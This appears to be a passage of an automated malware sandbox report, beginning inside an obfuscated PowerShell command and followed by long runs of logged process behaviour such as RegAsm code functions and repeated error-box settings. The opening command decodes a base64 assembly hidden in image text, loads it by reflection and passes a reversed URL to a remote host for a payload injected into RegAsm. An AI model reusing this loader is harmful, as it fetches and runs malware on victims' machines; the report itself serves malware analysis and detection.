{1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_034E5662 push eax; iretd 3_2_034E5699
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457186 push ecx; ret 11_2_00457199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045E55D push esi; ret 11_2_0045E566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00457AA8 push eax; ret 11_2_00457AC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00434EB6 push ecx; ret 11_2_00434EC9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_10002806 push ecx; ret 11_2_10002819
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00451D34 push eax; ret 16_2_00451D41
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW,11_2_00406EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,11_2_0041CBE1
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
